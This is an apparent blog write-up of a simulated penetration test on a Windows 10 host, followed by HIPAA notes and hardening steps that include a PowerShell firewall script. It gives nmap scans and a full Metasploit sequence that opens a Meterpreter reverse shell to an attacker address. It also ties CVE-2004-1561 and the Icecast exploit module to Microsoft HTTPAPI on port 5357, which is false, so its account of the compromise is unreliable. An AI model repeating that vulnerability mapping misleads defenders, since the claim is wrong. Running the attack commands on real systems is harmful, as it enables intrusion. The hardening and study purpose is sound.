VAPT Report on HTTPAPI Services in Windows 10 Healthcare Endpoint
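This report documents a simulated VAPT attack against a Windows 10 device, exploiting the Microsoft HTTPAPI vulnerability CVE-2004-1561 via port 5357 to compromise a device in a healthcare environment. The attacker gained system access using an Nmap scan and Metasploit, and the system was then hardened by disabling services and setting firewall rules. The report highlights the security risks posed by legacy protocols and misconfigured services in healthcare environments and recommends protections such as firewall configuration and service management. 2025-7-7 14:15:15 Author: infosecwriteups.com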

This report documents a targeted VAPT simulation that exploited Microsoft HTTPAPI via port 5357 to assess system misconfigurations and apply mitigation through service hardening and firewall enforcement.

Aditya Bhatt

Healthcare infrastructures, often relying on legacy systems and misconfigured services, are increasingly vulnerable to low-effort exploitation. This project simulates an internal red team operation aimed at identifying and exploiting known vulnerabilities in a Windows 10 machine running insecure HTTPAPI-based services through port 5357.

The core of this engagement revolved around discovering the presence of UPnP/SSDP exposure via Microsoft HTTPAPI, mapping the service using Nmap, confirming its version and exploitability, and ultimately weaponizing the vulnerability CVE-2004-1561 using Metasploit. This attack demonstrates how seemingly harmless services — like those used for device discovery — can be leveraged for unauthorized access.

This report also focuses on enforcing system hardening measures by applying firewall rules and disabling insecure ports and services — thus closing the attack surface.

Target: Windows 10 Host — Healthcare Environment

Prepared by: Aditya Bhatt
Designation: VAPT Analyst | Cybersecurity Professional
Contact: [email protected] | +91–9818993884

This report documents a security assessment of a Windows 10 endpoint within a simulated healthcare environment. The VAPT focused on identifying misconfigured or exposed services — specifically the HTTPAPI httpd 2.0 service running on TCP port 5357, typically associated with SSDP/UPnP protocols.

Through network scanning and service enumeration, the system was found to be vulnerable to CVE-2004-1561 — a known flaw in the HTTP header parsing of the Microsoft HTTPAPI. The vulnerability was exploited using Metasploit’s icecast_header module with a reverse HTTP Meterpreter payload, granting shell access.

The service was later disabled, and custom firewall rules were applied to prevent further exploitation. The system was successfully hardened, verified by a follow-up port scan.

  • Identify HIPAA compliance requirements as part of baseline regulatory understanding.
  • Perform enumeration and vulnerability mapping on a Windows 10 machine.
  • Exploit discovered HTTPAPI service using a known CVE.
  • Harden the system by disabling insecure services and enforcing firewall rules.

Before technical assessment, HIPAA compliance standards were analyzed:

  • Privacy Rule: Ensures PHI is accessed only with patient consent.
  • Security Rule: Requires encryption, access controls, and audit mechanisms for ePHI.
  • Breach Notification: Any breach of unsecured PHI must be reported to HHS.
  • Enforcement Rule & Omnibus Rule: Defines penalties and extends compliance to third-party vendors.

1. Target IP Identification

Command:

ipconfig

Output: IP Address of Windows host — 192.168.178.142

2. Live Host Discovery

nmap -sn 192.168.178.1/24

3. Identified active host: 192.168.178.142

4. Service Enumeration

nmap -sS 192.168.178.142 
nmap -sV -p5357 192.168.178.142

5. Detected: HTTPAPI httpd 2.0 on TCP port 5357

  • Vulnerability: CVE-2004-1561
  • Exploit Module: exploit/windows/http/icecast_header
  • Payload: windows/meterpreter/reverse_http

Metasploit Setup:

msfconsole
use exploit/windows/http/icecast_header
set payload windows/meterpreter/reverse_http
set RHOSTS 192.168.178.142
set RPORT 5357
set LHOST 192.168.178.137
exploit

Post-exploit command:

sysinfo

Outcome: Successfully obtained system details, confirming access via reverse shell.

Steps:

  • Navigate to Windows Firewall → Advanced Settings
  • Create custom inbound/outbound rules to block port 5357
  • Disable UPnP-related services, if active

Re-run port scan:

nmap -sV -p5357 192.168.178.142

Status: Port is now closed/filtered. No response from HTTPAPI service.
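
The hardening steps above can also be scripted rather than clicked through the firewall console. The following PowerShell is an added example, not the author's own commands; it assumes an elevated session, that "UPnP-related services" means the SSDP Discovery (SSDPSRV) and UPnP Device Host (upnphost) services, and the rule display names are constructed for illustration.

```powershell
#Requires -RunAsAdministrator
# Added example: scripted form of the hardening steps in this report.
$Port         = 5357                      # port named in the report
$UpnpServices = 'SSDPSRV', 'upnphost'     # assumption: SSDP Discovery, UPnP Device Host

# 1. Block the port in both directions on every firewall profile (safe to re-run).
foreach ($dir in 'Inbound', 'Outbound') {
    $name = "Block TCP $Port ($dir)"      # constructed rule name
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        $rule = @{
            DisplayName = $name
            Direction   = $dir
            Protocol    = 'TCP'
            Action      = 'Block'
            Profile     = 'Any'
        }
        # Inbound traffic targets the local port; outbound traffic targets the remote port.
        if ($dir -eq 'Inbound') { $rule.LocalPort = $Port } else { $rule.RemotePort = $Port }
        New-NetFirewallRule @rule | Out-Null
    }
}

# 2. Stop and disable the UPnP-related services, if they exist on this host.
foreach ($svc in $UpnpServices) {
    $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if ($s) {
        if ($s.Status -ne 'Stopped') { Stop-Service -Name $svc -Force }
        Set-Service -Name $svc -StartupType Disabled
    }
}

# 3. Local verification: show the rules, the service state, and any remaining listener.
Get-NetFirewallRule -DisplayName "Block TCP $Port*" |
    Select-Object DisplayName, Direction, Action, Enabled
Get-Service -Name $UpnpServices -ErrorAction SilentlyContinue |
    Select-Object Name, Status, StartType
$listeners = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
if ($listeners) {
    Write-Warning "TCP $Port still has a local listener; only the firewall rule blocks remote access."
} else {
    Write-Output "No local listener on TCP $Port."
}
```

The local check complements, but does not replace, the external re-scan: the nmap command above, run from another host, is what confirms the port is closed or filtered from the network.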

  • TCP port 5357 exposed to LAN with vulnerable HTTPAPI service
  • Vulnerability exploited successfully using Metasploit
  • Legacy protocol (UPnP) remains active on healthcare system endpoints
  • No firewall rules or monitoring in place at time of scan

1. Service Management

  • Disable UPnP, SSDP, and HTTPAPI if not required
  • Ensure only essential services are running

2. Patch Management

  • Apply all security patches regularly
  • Monitor for CVEs associated with system components

3. Firewall Configuration

  • Apply deny-all by default
  • Allow traffic only to known required ports/services

4. Network Segmentation

  • Isolate legacy systems or medical endpoints from production networks

5. HIPAA Alignment

  • Enforce access controls and breach reporting mechanisms
  • Audit connected systems for PHI exposure

This assessment confirms that even default Windows services like HTTPAPI can be exploited with well-known CVEs when misconfigured and unpatched. Through Nmap, Metasploit, and proper verification, the attack vector was proven effective, and the mitigation strategy — firewall hardening and service disabling — successfully secured the machine.

This case highlights the critical need for continuous vulnerability monitoring, strict firewall configurations, and minimal exposure of services on internal networks — especially in regulated environments like healthcare.

This VAPT engagement served as a clear demonstration of how overlooked services like HTTPAPI and protocols such as UPnP can open serious attack surfaces within enterprise environments — especially in healthcare, where system uptime often takes precedence over security hygiene.

While the exploitation required minimal effort, mitigation demanded structured firewall policies, service-level auditing, and an understanding of risk beyond what’s visible. In the end, proactive hardening proved to be the most effective defense.

Security isn’t just about fixing vulnerabilities — it’s about building systems that expect to be targeted and are ready to withstand it.

Thank you for reading. Stay informed. Stay secure.


Source: https://infosecwriteups.com/vapt-report-on-httpapi-services-in-windows-10-healthcare-endpoint-d4adb82e2877?source=rss----7b722bfd1b8d---4